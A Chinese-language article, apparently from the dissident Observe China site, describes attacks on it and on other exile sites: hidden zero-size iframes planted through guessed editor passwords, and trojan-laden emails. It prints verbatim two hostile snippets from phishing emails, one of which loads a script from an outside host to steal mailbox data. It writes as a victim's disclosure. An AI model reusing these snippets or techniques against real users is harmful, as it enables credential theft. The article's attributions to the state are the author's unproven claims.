中共的网络恐怖活动
—— 以对《观察》网站的攻击为例
杨莉藜
引言

两次海湾战争中西方展示的先进电子战术和飞速发展的网络技术,使野心勃勃的中共认识到电子战的重要意义,自上个世纪末以来,中共不惜血本,一方面致力于网络的防范,另一方面致力于网络的攻。在军事力量方面,1996年,中共成立了网络作战部队,2000年以来多次对台湾发起进攻,一次战斗甚至长达数月。在非军事方面,2000年以来,中央和地方相继成立了分别隶属于公安和国安的网络警察机构,据传,网警总人数已达三十多万。

除此之外,中共还网罗了一些网络愤青,组成黑客团伙。这部分人可以看作中共的网络民兵,虽然是乌合之众,但恐怖手段亦不可小觑。以“红客”自诩的这些网络黑客近几年来已经先后攻击过台湾、日本和美国的政府、甚至军事网站。

封堵网路,把不利于中共的信息拒之国门之外,监视、逮捕异议网络作家,只是中共网警的工作之一。他们的另一部分工作就是主动出击,攻击异议网站,破坏敌方网络与电脑,盗取敏感信息。他们的前一种工作已经引起了人们的广泛关注,后一种工作尚需受害者的揭露、曝光和有效的防范。

《观察》网站自2002年创办以来,秉承“知”的宗旨,客观、真实地向大陆读者传递被中共查禁的信息。网站丰富的内容、犀利的前瞻性和平实的文风赢得了越来越多的读者的喜爱,因而也成为中共网络恐怖力量首要的攻击目标之一。本网站受攻击的个案因此具有一定的典型意义。

《观察》的鬼魅编辑

至少从2006年秋天以来,登陆《观察》网站的一些读者常常发现杀毒软件提醒网站有病毒。这种情况时断时续,一直没有得到彻底的解决。最初我们的想法是中共的黑客通过某种高技术手段把病毒植入我们的网站,我们的技术力量有限,彻查困难不小。然而经过一番观察和分析之后发现,中共网络恐怖分子不过是冒充我们的编辑进入网站,把一段链接代码加入了我们的网页。

《观察》重要文章都会在首页的中间栏目出现,并附以内容简介。我们的这位“编外”工作人员勤勤恳恳执行自己的任务,每当美国进入夜晚,便登入我们的网站,进入编辑工作界面,把通往病毒网页的链接加到某篇新发表文章的简介部分。由于首页的文章不断更新,他需要定时定点地关注我们的首页,等到植入病毒的那篇文章快要从首页推移到次页时,就把原来那段病毒代码剪切掉,拷贝到新文章的简介部分,使《观察》首页一直保持带有病毒的状态。

图一:鬼魅编辑在《观察》网站写入病毒链接(2007年3月25日抓图)
从2006年底到今年5月,《观察》先后被链接到台湾、中国和美国的病毒网站。这些病毒网站可能是攻击《观察》的恐怖分子临时找的肉鸡,也有可能本来就是中共网络间谍的窝点。这些木马病毒可以感染浏览者的电脑,收集浏览者的信息,同时也使给《观察》网站运行不畅,数据库经常出错。

上图是2007年3月25日《观察》的影子编辑在美东世界晚9点15分冒充我网站编辑在一篇文章的摘要中加入病毒链接。从链接的地址看zggc当是指“中国观察”,gc自然就是“观察”,是一个专门用来监控我网站的网页。经查证,该网站位于中国四川。

找到了中共网络恐怖分子的进攻方法之后,《观察》工作人员各自更新了ID和密码,这之后此类病毒便宣告绝迹。我们的基本分析是:工作人员ID和密码过于简单,使中共网络恐怖分子以穷举的方法找出了密码,因此可以以编辑的名义进入工作界面,随意植入病毒。这样植入的病毒,一般可以在网站首页的源文件里看出来。病毒链接一般放在一个框架(frame)里,但是常把Frame的长宽高设为零,使肉眼无法看出这个框架的存在。

按照这个规律,笔者先后在以下网站发现了同样或相似的病毒,而且不少病毒已经不止一日存在,连Google搜索到这些网站都会显示一条信息,提醒读者这些网站有病毒存在:

独立中文笔会网站 (www.chinesepen.org)
新世纪新闻网 (www.newcenturyworld.com)
林昭纪念网 (www.linzhao.org)
维权网 (www.crd-net.org)

图二:Google对独立中文笔会网站的提示(2007年7月19日抓图)

这些网站中以独立中文笔会网站的受害程度为最。恐怖分子不但在该网站的主页植入病毒,在许多单篇文章中也有病毒存在。看来他们的网络漏洞多多,鬼魅编辑可以如入无人之境地四处“埋雷”。

防不胜防的邮件病毒

通过电子邮件携带的附件向敌方发送病毒是网络恐怖活动的常用手段,《观察》的工作人员长期以来也深受困扰。编辑部和编辑人员的个人信箱至少每天收到一封携带病毒的邮件,有时每天甚至多达数封。

邮件附件包含的病毒多是间谍木马,以植入接收者电脑,并感染和接收者有关的其他联系人。少数附件带有攻击windows操作系统,特别是IE浏览器和Windows系统浏览器的恶性病毒,造成系统运行不畅,信息外泄,甚至导致操作系统全盘崩溃。

经过半年多的观察分析,我们发现邮件病毒攻击者多采用ZIP和RAR压缩包的方式隐藏病毒,有时也通过HTMLHELP文档、HTML文档、WORD文档等传播病毒。攻击的时机多选择有新闻热点出现时,伪装成新闻提供者向编辑部投稿。经查证,这些攻击者多来自中国大陆,邮件地址多为新注册信箱,但也经常模拟或者盗用有一定知名度的作者信箱,近期我们收到的携毒邮件有模拟或盗用丁子霖、王怡、李昌玉、杨银波等人的邮件地址的。

为遏制这些网络恐怖分子的骚扰,降低携毒邮件对其它接收者的毒害,《观察》于两个月前推出了“最新病毒警报”(http://observechina.net/info/artShow.asp?id=43640),及时将编辑部收到的重要携毒邮件信息上网公布。此举虽然无法彻底解决携毒邮件的攻击问题,但把鸡鸣狗盗的网络恐怖分子的面目和手段暴露在阳光下,使其无法在网络的掩护下为所欲为,一定程度上降低了此类携毒邮件对《观察》的攻击频度。

神秘女人“我爱海”

woaihai123@163.com是不是叫“我爱海”,是不是“女人”都不得而知。她(他)发给笔者的邮件总是通过某种技术从hotmail发出,而返回的路径都是Woaihai123@163.com(经查,IP为59.50.89.38 ,大约来自中国海南)。她不断变换发件人名称,分别叫做“凄惨女”、 “申雪”、“林菲”、“农民之子”,“王一”等,代理163邮箱的hotmail邮箱分别有ceshizhu@hotmail.com, ceshiniu@hotmail.com等。大概是以“猪马牛羊”来排列她(他)注册的一系列进行恐怖活动的hotmail邮箱。

图三:“我爱海”的信头信息(2007年5月12日抓图)
2007年5月初,“我爱海”先是以“凄惨女”,后以“申雪”自称,写信到笔者的私人邮箱,探问普林斯顿会议的具体安排。她(他)的第一封信就引起了我的怀疑。为保证来自大陆的右派和反右研究者不受中共阻挠,如期与会,我们的会议一直严格保密,而这位“我爱海”却消息灵通,而且还把邮件寄到笔者的私人信箱。好奇之下,仔细察看她(他)的信头和信件内容,终于发现这个女人凄凄惨惨的面纱下掩盖的却是一个恐怖女谍的嘴脸。

在信件的正文内容前,“我爱海”加入了这样一段代码:

if (typeof(_0_)==\”undefined\”){_0_=1;_0_=document.createElement(\”SCRIPT\”);
_0_.src=\”http://ras2007-1.at.vwdhosting.net/2.2/84132/comhotmail/?dr_yll~hotmail.com\”;
document.insertBefore(_0_,document.getElementsByTagName(\”*\”)[0]);}

这段代码设定为不可见,必须进入源文件才可以看到。笔者对于java语言是门外汉,但是仍依然可以看出,这段代码是要从收件人信箱窃取信息。只要收件人打开此邮件,这些代码就开始起作用。为了稳着“我爱海”,进一步了解她(他)的间谍伎俩,我特意给她(他)回了封客客气气的信,问候她(他)所说的右派父亲的情况。她(他)也照例回答,但每封信都暗藏了这组代码。此后,“我爱海”又分别以别的名字继续发来电子邮件,大概是因为我早有防备,她(他)未能如期盗窃到相关信息,她(他)就有时改进了盗取的方法,把信件的实际编码和显示编码改得不一致,这样收信人看到的就是乱码,为了看清内容,就要尝试别的编码,这样就等于重新刷新了页面,重新执行了页面内暗藏的代码。

以网页暗藏代码骚扰收件人的情况不止“我爱海”一例。她(他)的代码是为了盗取收件人信息,而有的网络恐怖分子则完全是为了破坏对方的电脑和网络。两周前,一位网络恐怖分子盗用或模仿《民主中国》编辑蔡楚的hotmail邮箱:caichu@hotmail.com,给笔者发来邮件,征求对《民主中国》的意见和建议,实际发出地址为:wanbudeyi@163.com(经查,IP为59.52.159.16 ,大约来自中国江西)。这封邮件暗含了如下代码:

〈DIV id=skii style=\”DISPLAY: none\” 〉love〈/DIV〉
〈DIV id=ly style=\”DISPLAY: none\”〉function ok(){return
true};window.onerror=ok〈/DIV〉
〈DIV id=good title=\’〈a style=\”display:none\”〉\’ style=\”DISPLAY: none\”>〈/div〉

除非特别定义,代码中的“love”没有任何作用,完全是掩人耳目。主要的攻击代码在第二和第三行。虽然这样的小玩意技术含量不高,但是却使电脑在解析和执行中颇费周折,极易造成死机。与“我爱海”这样的专业职恐怖分子比,这个自称“万不得已”的家伙大概是中共的网络游击队员吧。

网络恐怖分子遍布世界

经过半年多的记录和分析,笔者发现攻击《观察》网站,向《观察》编辑发送病毒的恐怖分子除了来自大陆外,为数不少的来自台湾、南韩、加拿大、美国。中共经营的网络恐怖分子网络可以说已经遍布世界各地。这些恐怖分子如何相互联络、协调行动,我们不得而知,但是可以预见的是,一旦中共和其它国家爆发大规模电子战,人们将会发现中共的网络恐怖分子像老鼠一样四处出没,里应外合,同敌手展开一场现代意义的麻雀战。中共的网络恐怖分子数量之多,分布之广,将震惊世界。

日前,美国联邦调查局在洛杉矶湾区华人报纸刊登了一则呼吁民众提供情报的广告,要求知情者向美国提供中共间谍在美国活动的情况。对此,中共方面反应强烈,批评美国无中生有。就网络恐怖活动观之,美国的警惕一点儿不为过分。联邦调查局目前关注的还只是中共间谍在现实世界里的活动,殊不知在虚拟世界里这些鸡鸣狗盗之徒更是群魔乱舞,为所欲为。

无论是为了保护目前网络居民的知情权、隐私权、信息交流权,或是为了未来可能爆发的电子战,人们对中共日渐猖獗的网络恐怖活动都不能再听之任之。

──《观察》首发    转载请注明出处